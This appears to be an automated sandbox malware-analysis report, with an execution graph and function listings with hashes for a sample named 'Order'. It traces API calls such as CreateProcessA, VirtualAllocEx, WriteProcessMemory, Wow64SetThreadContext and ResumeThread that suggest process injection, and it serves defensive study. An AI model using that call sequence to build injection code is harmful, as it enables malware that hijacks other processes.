                                                                                                                                    execution_graph 43040 c1ad50 43043 c1ae38 43040->43043 43041 c1ad5f 43044 c1ae41 43043->43044 43045 c1ae7c 43044->43045 43046 c1b080 GetModuleHandleW 43044->43046 43045->43041 43047 c1b0ad 43046->43047 43047->43041 43079 c1d730 DuplicateHandle 43080 c1d7c6 43079->43080 43048 c1d4e8 43049 c1d52e GetCurrentProcess 43048->43049 43051 c1d580 GetCurrentThread 43049->43051 43052 c1d579 43049->43052 43053 c1d5b6 43051->43053 43054 c1d5bd GetCurrentProcess 43051->43054 43052->43051 43053->43054 43057 c1d5f3 43054->43057 43055 c1d61b GetCurrentThreadId 43056 c1d64c 43055->43056 43057->43055 43058 c14668 43059 c1467a 43058->43059 43060 c14686 43059->43060 43062 c14779 43059->43062 43063 c14781 43062->43063 43067 c14879 43063->43067 43071 c14888 43063->43071 43069 c14881 43067->43069 43068 c1498c 43068->43068 43069->43068 43075 c144d4 43069->43075 43072 c148af 43071->43072 43073 c1498c 43072->43073 43074 c144d4 CreateActCtxA 43072->43074 43074->43073 43076 c15918 CreateActCtxA 43075->43076 43078 c159db 43076->43078 43033 7ac7360 43034 7ac7386 43033->43034 43035 7ac74eb 43033->43035 43034->43035 43037 7ac6e9c 43034->43037 43038 7ac75e0 PostMessageW 43037->43038 43039 7ac764c 43038->43039 43039->43034 43081 7ac4ed3 43082 7ac4eb8 43081->43082 43083 7ac4f31 43082->43083 43087 7ac5c2e 43082->43087 43094 7ac5bc8 43082->43094 43100 7ac5bb8 43082->43100 43088 7ac5bbc 43087->43088 43090 7ac5c31 43087->43090 43106 7ac5f20 43088->43106 43124 7ac5f22 43088->43124 43142 7ac5f51 43088->43142 43089 7ac5bea 43089->43082 43090->43082 43095 7ac5be2 43094->43095 43097 7ac5f20 12 API calls 43095->43097 43098 7ac5f51 12 API calls 43095->43098 43099 7ac5f22 12 API calls 43095->43099 43096 7ac5bea 43096->43082 43097->43096 43098->43096 43099->43096 43101 7ac5bc7 43100->43101 43103 7ac5f20 12 API calls 43101->43103 43104 7ac5f51 12 API calls 43101->43104 43105 7ac5f22 12 API calls 43101->43105 43102 7ac5bea 43102->43082 43103->43102 43104->43102 43105->43102 43107 7ac5f35 43106->43107 43108 7ac5f47 43107->43108 43123 7ac5f51 12 API calls 43107->43123 43165 7ac63cf 43107->43165 43173 7ac6a50 43107->43173 43178 7ac6630 43107->43178 43183 7ac61d6 43107->43183 43187 7ac611a 43107->43187 43193 7ac679e 43107->43193 43197 7ac655e 43107->43197 43202 7ac65fe 43107->43202 43207 7ac5f60 43107->43207 43213 7ac6364 43107->43213 43218 7ac62ca 43107->43218 43224 7ac64a9 43107->43224 43229 7ac6969 43107->43229 43237 7ac6729 43107->43237 43108->43089 43123->43108 43125 7ac5f35 43124->43125 43126 7ac5f47 43125->43126 43127 7ac63cf 4 API calls 43125->43127 43128 7ac6729 2 API calls 43125->43128 43129 7ac6969 4 API calls 43125->43129 43130 7ac64a9 2 API calls 43125->43130 43131 7ac62ca 2 API calls 43125->43131 43132 7ac6364 2 API calls 43125->43132 43133 7ac5f60 2 API calls 43125->43133 43134 7ac65fe 2 API calls 43125->43134 43135 7ac655e 2 API calls 43125->43135 43136 7ac679e 2 API calls 43125->43136 43137 7ac611a 2 API calls 43125->43137 43138 7ac61d6 2 API calls 43125->43138 43139 7ac6630 2 API calls 43125->43139 43140 7ac6a50 2 API calls 43125->43140 43141 7ac5f51 12 API calls 43125->43141 43126->43089 43127->43126 43128->43126 43129->43126 43130->43126 43131->43126 43132->43126 43133->43126 43134->43126 43135->43126 43136->43126 43137->43126 43138->43126 43139->43126 43140->43126 43141->43126 43143 7ac5f3f 43142->43143 43146 7ac5f5e 43142->43146 43144 7ac5f47 43143->43144 43150 7ac63cf 4 API calls 43143->43150 43151 7ac6729 2 API calls 43143->43151 43152 7ac6969 4 API calls 43143->43152 43153 7ac64a9 2 API calls 43143->43153 43154 7ac62ca 2 API calls 43143->43154 43155 7ac6364 2 API calls 43143->43155 43156 7ac5f60 2 API calls 43143->43156 43157 7ac65fe 2 API calls 43143->43157 43158 7ac655e 2 API calls 43143->43158 43159 7ac679e 2 API calls 43143->43159 43160 7ac611a 2 API calls 43143->43160 43161 7ac61d6 2 API calls 43143->43161 43162 7ac6630 2 API calls 43143->43162 43163 7ac6a50 2 API calls 43143->43163 43164 7ac5f51 12 API calls 43143->43164 43144->43089 43145 7ac604e 43145->43089 43146->43145 43148 7ac491d CreateProcessA 43146->43148 43149 7ac4928 CreateProcessA 43146->43149 43147 7ac6166 43147->43089 43148->43147 43149->43147 43150->43144 43151->43144 43152->43144 43153->43144 43154->43144 43155->43144 43156->43144 43157->43144 43158->43144 43159->43144 43160->43144 43161->43144 43162->43144 43163->43144 43164->43144 43241 7ac4698 43165->43241 43245 7ac46a0 43165->43245 43166 7ac6798 43166->43108 43167 7ac62dc 43167->43166 43249 7ac4018 43167->43249 43253 7ac4020 43167->43253 43168 7ac658a 43174 7ac6a5a 43173->43174 43257 7ac4788 43174->43257 43261 7ac4790 43174->43261 43175 7ac6a7c 43179 7ac6636 43178->43179 43181 7ac4788 ReadProcessMemory 43179->43181 43182 7ac4790 ReadProcessMemory 43179->43182 43180 7ac6a7c 43181->43180 43182->43180 43185 7ac4698 WriteProcessMemory 43183->43185 43186 7ac46a0 WriteProcessMemory 43183->43186 43184 7ac6208 43184->43108 43185->43184 43186->43184 43189 7ac6056 43187->43189 43188 7ac604e 43188->43108 43189->43188 43265 7ac491d 43189->43265 43269 7ac4928 43189->43269 43273 7ac45d8 43193->43273 43277 7ac45e0 43193->43277 43194 7ac67bc 43194->43108 43198 7ac6564 43197->43198 43200 7ac4018 ResumeThread 43198->43200 43201 7ac4020 ResumeThread 43198->43201 43199 7ac658a 43200->43199 43201->43199 43203 7ac661d 43202->43203 43205 7ac4698 WriteProcessMemory 43203->43205 43206 7ac46a0 WriteProcessMemory 43203->43206 43204 7ac6b2a 43205->43204 43206->43204 43209 7ac5f93 43207->43209 43208 7ac604e 43208->43108 43209->43208 43211 7ac491d CreateProcessA 43209->43211 43212 7ac4928 CreateProcessA 43209->43212 43210 7ac6166 43210->43108 43211->43210 43212->43210 43214 7ac6371 43213->43214 43216 7ac4788 ReadProcessMemory 43214->43216 43217 7ac4790 ReadProcessMemory 43214->43217 43215 7ac6a7c 43216->43215 43217->43215 43220 7ac62dc 43218->43220 43219 7ac658a 43221 7ac6798 43220->43221 43222 7ac4018 ResumeThread 43220->43222 43223 7ac4020 ResumeThread 43220->43223 43221->43108 43222->43219 43223->43219 43225 7ac64af 43224->43225 43227 7ac4788 ReadProcessMemory 43225->43227 43228 7ac4790 ReadProcessMemory 43225->43228 43226 7ac6a7c 43227->43226 43228->43226 43281 7ac4508 43229->43281 43285 7ac4501 43229->43285 43230 7ac6aec 43231 7ac64c7 43231->43230 43235 7ac4788 ReadProcessMemory 43231->43235 43236 7ac4790 ReadProcessMemory 43231->43236 43232 7ac6a7c 43235->43232 43236->43232 43239 7ac4508 Wow64SetThreadContext 43237->43239 43240 7ac4501 Wow64SetThreadContext 43237->43240 43238 7ac6743 43238->43108 43239->43238 43240->43238 43242 7ac46a0 WriteProcessMemory 43241->43242 43244 7ac473f 43242->43244 43244->43167 43246 7ac46e8 WriteProcessMemory 43245->43246 43248 7ac473f 43246->43248 43248->43167 43250 7ac4020 ResumeThread 43249->43250 43252 7ac4091 43250->43252 43252->43168 43254 7ac4060 ResumeThread 43253->43254 43256 7ac4091 43254->43256 43256->43168 43258 7ac47fe ReadProcessMemory 43257->43258 43260 7ac478e 43257->43260 43259 7ac481f 43258->43259 43259->43175 43260->43258 43262 7ac4797 ReadProcessMemory 43261->43262 43264 7ac481f 43262->43264 43264->43175 43266 7ac4927 CreateProcessA 43265->43266 43268 7ac4b73 43266->43268 43270 7ac499c CreateProcessA 43269->43270 43272 7ac4b73 43270->43272 43274 7ac45e0 VirtualAllocEx 43273->43274 43276 7ac465d 43274->43276 43276->43194 43278 7ac4620 VirtualAllocEx 43277->43278 43280 7ac465d 43278->43280 43280->43194 43282 7ac454d Wow64SetThreadContext 43281->43282 43284 7ac4595 43282->43284 43284->43231 43286 7ac454d Wow64SetThreadContext 43285->43286 43288 7ac4595 43286->43288 43288->43231

                                                                                                                                    Executed Functions

                                                                                                                                    Function 055A74A0 Relevance: 7.3, Strings: 5, Instructions: 1001COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 296 55a74a0-55a74c1 297 55a74c8-55a75b4 296->297 298 55a74c3 296->298 300 55a75ba-55a7705 call 55a7408 297->300 301 55a7dd9-55a7e01 297->301 298->297 347 55a770b-55a7766 300->347 348 55a7da6-55a7dd7 300->348 304 55a84d0-55a84d9 301->304 306 55a7e0f-55a7e18 304->306 307 55a84df-55a84f6 304->307 308 55a7e1a 306->308 309 55a7e1f-55a7f0f call 55a7408 306->309 308->309 330 55a7f39 309->330 331 55a7f11-55a7f1d 309->331 332 55a7f3f-55a7f5f 330->332 333 55a7f1f-55a7f25 331->333 334 55a7f27-55a7f2d 331->334 338 55a7fbd-55a8035 332->338 339 55a7f61-55a7fb8 332->339 336 55a7f37 333->336 334->336 336->332 359 55a808a-55a80cd call 55a7408 338->359 360 55a8037-55a8088 338->360 353 55a84cd 339->353 354 55a776b-55a7776 347->354 355 55a7768 347->355 348->301 353->304 358 55a7cba-55a7cc0 354->358 355->354 361 55a777b-55a7799 358->361 362 55a7cc6-55a7d43 358->362 386 55a80d8-55a80de 359->386 360->386 365 55a779b-55a779f 361->365 366 55a77f0-55a7805 361->366 407 55a7d90-55a7d96 362->407 365->366 372 55a77a1-55a77ac 365->372 370 55a780c-55a7822 366->370 371 55a7807 366->371 375 55a7829-55a7840 370->375 376 55a7824 370->376 371->370 377 55a77e2-55a77e8 372->377 382 55a7842 375->382 383 55a7847-55a785d 375->383 376->375 379 55a77ea-55a77eb 377->379 380 55a77ae-55a77b2 377->380 389 55a786e-55a78df 379->389 384 55a77b8-55a77d0 380->384 385 55a77b4 380->385 382->383 387 55a785f 383->387 388 55a7864-55a786b 383->388 391 55a77d2 384->391 392 55a77d7-55a77df 384->392 385->384 393 55a8133-55a813f 386->393 387->388 388->389 394 55a78e1 389->394 395 55a78f5-55a7a6d 389->395 391->392 392->377 398 55a80e0-55a8102 393->398 399 55a8141-55a81c7 393->399 394->395 397 55a78e3-55a78ef 394->397 404 55a7a6f 395->404 405 55a7a83-55a7bbe 395->405 397->395 400 55a8109-55a8130 398->400 401 55a8104 398->401 426 55a8346-55a834f 399->426 400->393 401->400 404->405 409 55a7a71-55a7a7d 404->409 418 55a7c22-55a7c37 405->418 419 55a7bc0-55a7bc4 405->419 410 55a7d98-55a7d9e 407->410 411 55a7d45-55a7d8d 407->411 409->405 410->348 411->407 423 55a7c39 418->423 424 55a7c3e-55a7c5f 418->424 419->418 421 55a7bc6-55a7bd5 419->421 425 55a7c14-55a7c1a 421->425 423->424 428 55a7c61 424->428 429 55a7c66-55a7c85 424->429 434 55a7c1c-55a7c1d 425->434 435 55a7bd7-55a7bdb 425->435 430 55a81cc-55a81e1 426->430 431 55a8355-55a83b0 426->431 428->429 432 55a7c8c-55a7cac 429->432 433 55a7c87 429->433 438 55a81ea-55a8334 430->438 439 55a81e3 430->439 457 55a83b2-55a83e5 431->457 458 55a83e7-55a8411 431->458 440 55a7cae 432->440 441 55a7cb3 432->441 433->432 442 55a7cb7 434->442 436 55a7bdd-55a7be1 435->436 437 55a7be5-55a7c06 435->437 436->437 444 55a7c08 437->444 445 55a7c0d-55a7c11 437->445 463 55a8340 438->463 439->438 446 55a82bb-55a82fb 439->446 447 55a8278-55a82b6 439->447 448 55a8233-55a8273 439->448 449 55a81f0-55a822e 439->449 440->441 441->442 442->358 444->445 445->425 446->463 447->463 448->463 449->463 466 55a841a-55a84a3 457->466 458->466 463->426 471 55a84a9 call 55a8ed8 466->471 472 55a84a9 call 55a8ee8 466->472 470 55a84af-55a84c1 470->353 471->470 472->470
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                                                    • API String ID: 0-2576840827
                                                                                                                                    • Opcode ID: cfd8b9cf967f94bd07a6f41ea402a690dc7c3426846ff4704bc23a2db73d82c4
                                                                                                                                    • Instruction ID: 05b413e8083f17f5991f7d51a73f72adf82738bc41d012e2965add6f5357becc
                                                                                                                                    • Opcode Fuzzy Hash: cfd8b9cf967f94bd07a6f41ea402a690dc7c3426846ff4704bc23a2db73d82c4
                                                                                                                                    • Instruction Fuzzy Hash: 79B2C375E002289FDB64CF69C984ADDBBB2FF89304F1581E5D509AB225DB31AE91CF40
                                                                                                                                    Function 07AC8468 Relevance: .4, Instructions: 405COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3e6f68c798b142291667684cd42455da046ac46b06eaf2a8ecb240a701047e1e
                                                                                                                                    • Instruction ID: e1c38a4fd32796fe572b5a5ffa8e3515f81bd69ec54d5f5a52fa95e2e9fb0d90
                                                                                                                                    • Opcode Fuzzy Hash: 3e6f68c798b142291667684cd42455da046ac46b06eaf2a8ecb240a701047e1e
                                                                                                                                    • Instruction Fuzzy Hash: 1FE1DDB1B01604AFEB2ADB75C550BAEB7F6BFC9300F10446DE1569B291CB39E841CB52
                                                                                                                                    Function 055AA370 Relevance: .3, Instructions: 300COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bc83dd776eb9f2af822ec0cfc500fd6f69e61a7b715571142797f2842806353c
                                                                                                                                    • Instruction ID: c88ed365d23921a623be888dbe7547602e02c4302d0123dc310f1f96ae314fa3
                                                                                                                                    • Opcode Fuzzy Hash: bc83dd776eb9f2af822ec0cfc500fd6f69e61a7b715571142797f2842806353c
                                                                                                                                    • Instruction Fuzzy Hash: CDD1E971D05228CFEB64DFA5C848BEEBBF2FB89300F1081AAE519A7241D7745985CF51
                                                                                                                                    Function 055AA380 Relevance: .3, Instructions: 298COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8a8c72cb176916c32cc13f8d649196ad09d6d9c5d87a26307d3e85b4bcc60778
                                                                                                                                    • Instruction ID: d6dcf1fd27bd16b00fe5b747c7d75b56a4832b2eb823775fa96ce594c56ed8f1
                                                                                                                                    • Opcode Fuzzy Hash: 8a8c72cb176916c32cc13f8d649196ad09d6d9c5d87a26307d3e85b4bcc60778
                                                                                                                                    • Instruction Fuzzy Hash: 24D1E971D05228CFEB64DFA5C848BEEBBF2FB89300F1091AAE519A7240D7745985CF91
                                                                                                                                    Function 07AC5F60 Relevance: .2, Instructions: 170COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 258c77b0079ca0d85e37b22535a6e07ea2e7d147c5d43360b4851ae8781607cf
                                                                                                                                    • Instruction ID: eb0ac848dfd1de144b509b8c744fd6f181a65502a1942e68df41af7665163a65
                                                                                                                                    • Opcode Fuzzy Hash: 258c77b0079ca0d85e37b22535a6e07ea2e7d147c5d43360b4851ae8781607cf
                                                                                                                                    • Instruction Fuzzy Hash: 7071F5B1D15229DBEB24CF66C8407E9BBB6AF8A300F10D1EAD41DA6254EB701AC5CF41
                                                                                                                                    Function 055AAB27 Relevance: .2, Instructions: 164COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9419a74bd8a2c3b2f356268a85105aef241e4fdb44b128db579ab11f6f60b6e5
                                                                                                                                    • Instruction ID: f230a72444cb3f0462c103666e3f01182556a4521c5664a9b7c30ef6a58fe493
                                                                                                                                    • Opcode Fuzzy Hash: 9419a74bd8a2c3b2f356268a85105aef241e4fdb44b128db579ab11f6f60b6e5
                                                                                                                                    • Instruction Fuzzy Hash: 9F61D0B1D04228CFDB24CFAAD8847DEBBF2BB89300F14D5AAD409A7251DB345986CF51
                                                                                                                                    Function 055AAB38 Relevance: .2, Instructions: 161COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a75130a7d797027eae2daa8e0bbb6d9e2990c0e14da020d8c5b7ffe545ee347b
                                                                                                                                    • Instruction ID: 807f27241dbb2f9ad5d9e43429d15ae7318c3e1a2b694bd17a10c02545c4366f
                                                                                                                                    • Opcode Fuzzy Hash: a75130a7d797027eae2daa8e0bbb6d9e2990c0e14da020d8c5b7ffe545ee347b
                                                                                                                                    • Instruction Fuzzy Hash: 2261BFB1D04228CFDB24CFAAD844BEEBBF2BB89300F14D5AAD409A7255DB345985CF51
                                                                                                                                    Function 055AE45B Relevance: .1, Instructions: 148COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e0e4d986dbc69a24d46a327751dd626f6a5847b2c34daba18a2c2d63555a7a94
                                                                                                                                    • Instruction ID: 1c8de5052db015e07d23c00ed45d4374971fbc8c1e373d12b877f872e3c2f334
                                                                                                                                    • Opcode Fuzzy Hash: e0e4d986dbc69a24d46a327751dd626f6a5847b2c34daba18a2c2d63555a7a94
                                                                                                                                    • Instruction Fuzzy Hash: B351A1B6D0D2448FDB05CFA9E4452EDBFFABF8E300F1494AAE459A7292D7344941CB90
                                                                                                                                    Function 07AC5F51 Relevance: .1, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ee32ed3ec4a31d23dda4afd3dbd2949c8a02543944f001689a149832483fb777
                                                                                                                                    • Instruction ID: f495afdf6596749599d2c143943c178dc71056422bb5c62eaf66527c5b893ddd
                                                                                                                                    • Opcode Fuzzy Hash: ee32ed3ec4a31d23dda4afd3dbd2949c8a02543944f001689a149832483fb777
                                                                                                                                    • Instruction Fuzzy Hash: E731EBB1D056289AEB28CF66DD053DAFBF6AFC9305F04C1AAC41CA6255DB740A898F41
                                                                                                                                    Function 00C1D4D8 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 579 c1d4d8-c1d4e0 580 c1d4e2-c1d577 GetCurrentProcess 579->580 581 c1d49b-c1d49d 579->581 586 c1d580-c1d5b4 GetCurrentThread 580->586 587 c1d579-c1d57f 580->587 581->579 588 c1d5b6-c1d5bc 586->588 589 c1d5bd-c1d5f1 GetCurrentProcess 586->589 587->586 588->589 590 c1d5f3-c1d5f9 589->590 591 c1d5fa-c1d615 call c1d6b7 589->591 590->591 595 c1d61b-c1d64a GetCurrentThreadId 591->595 596 c1d653-c1d6b5 595->596 597 c1d64c-c1d652 595->597 597->596
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D566
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00C1D5A3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D5E0
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C1D639
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                    • Opcode ID: 97d71c2829f6d0c66f172b29fcb4e533e4323ff8edce11071aaef7d1e10a6f61
                                                                                                                                    • Instruction ID: f6fa5521225904e650e38685f6cef9910282e1a266fafb995cbe6fcd35d26309
                                                                                                                                    • Opcode Fuzzy Hash: 97d71c2829f6d0c66f172b29fcb4e533e4323ff8edce11071aaef7d1e10a6f61
                                                                                                                                    • Instruction Fuzzy Hash: 675146B0D043098FDB15DFA9D648BEEBBF2AF89304F208459E059A7360D7749984CF66
                                                                                                                                    Function 00C1D4E8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 604 c1d4e8-c1d577 GetCurrentProcess 608 c1d580-c1d5b4 GetCurrentThread 604->608 609 c1d579-c1d57f 604->609 610 c1d5b6-c1d5bc 608->610 611 c1d5bd-c1d5f1 GetCurrentProcess 608->611 609->608 610->611 612 c1d5f3-c1d5f9 611->612 613 c1d5fa-c1d615 call c1d6b7 611->613 612->613 617 c1d61b-c1d64a GetCurrentThreadId 613->617 618 c1d653-c1d6b5 617->618 619 c1d64c-c1d652 617->619 619->618
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D566
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00C1D5A3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00C1D5E0
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C1D639
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                    • Opcode ID: dae20bffc5ff9c16aff86ccbb119fc0651d8600a7de44833d058c9b8bac0da5f
                                                                                                                                    • Instruction ID: 6f6f64aa4f5d62d6d6f196e0efdf0700a4e47e8d83f1480a521d0c7df67d804a
                                                                                                                                    • Opcode Fuzzy Hash: dae20bffc5ff9c16aff86ccbb119fc0651d8600a7de44833d058c9b8bac0da5f
                                                                                                                                    • Instruction Fuzzy Hash: 285144B0D003098FDB14DFAAD648BEEBBF5AF88304F208459E019A7360D774A984CF65
                                                                                                                                    Function 07AC491D Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 806 7ac491d-7ac4925 807 7ac499c-7ac49bd 806->807 808 7ac4927-7ac4992 806->808 811 7ac49bf-7ac49c9 807->811 812 7ac49f6-7ac4a16 807->812 808->807 811->812 813 7ac49cb-7ac49cd 811->813 817 7ac4a4f-7ac4a7e 812->817 818 7ac4a18-7ac4a22 812->818 815 7ac49cf-7ac49d9 813->815 816 7ac49f0-7ac49f3 813->816 819 7ac49dd-7ac49ec 815->819 820 7ac49db 815->820 816->812 828 7ac4ab7-7ac4b71 CreateProcessA 817->828 829 7ac4a80-7ac4a8a 817->829 818->817 821 7ac4a24-7ac4a26 818->821 819->819 822 7ac49ee 819->822 820->819 823 7ac4a28-7ac4a32 821->823 824 7ac4a49-7ac4a4c 821->824 822->816 826 7ac4a34 823->826 827 7ac4a36-7ac4a45 823->827 824->817 826->827 827->827 830 7ac4a47 827->830 840 7ac4b7a-7ac4c00 828->840 841 7ac4b73-7ac4b79 828->841 829->828 831 7ac4a8c-7ac4a8e 829->831 830->824 833 7ac4a90-7ac4a9a 831->833 834 7ac4ab1-7ac4ab4 831->834 835 7ac4a9c 833->835 836 7ac4a9e-7ac4aad 833->836 834->828 835->836 836->836 837 7ac4aaf 836->837 837->834 851 7ac4c10-7ac4c14 840->851 852 7ac4c02-7ac4c06 840->852 841->840 854 7ac4c24-7ac4c28 851->854 855 7ac4c16-7ac4c1a 851->855 852->851 853 7ac4c08 852->853 853->851 856 7ac4c38-7ac4c3c 854->856 857 7ac4c2a-7ac4c2e 854->857 855->854 858 7ac4c1c 855->858 860 7ac4c4e-7ac4c55 856->860 861 7ac4c3e-7ac4c44 856->861 857->856 859 7ac4c30 857->859 858->854 859->856 862 7ac4c6c 860->862 863 7ac4c57-7ac4c66 860->863 861->860 865 7ac4c6d 862->865 863->862 865->865
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AC4B5E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 6638118b64d0c6ca3fd20e49c1f12f4dea70f920e05eba36b363841e16e520e2
                                                                                                                                    • Instruction ID: b1a95a740f0c3f907553d3c84627f99a4a78789c856f145c431bb88df1fa37b2
                                                                                                                                    • Opcode Fuzzy Hash: 6638118b64d0c6ca3fd20e49c1f12f4dea70f920e05eba36b363841e16e520e2
                                                                                                                                    • Instruction Fuzzy Hash: 6FA18FB1D0025ADFDB20CF68C850BDEBBB2FF48314F1481A9E858A7250DB749985CF95
                                                                                                                                    Function 07AC4928 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
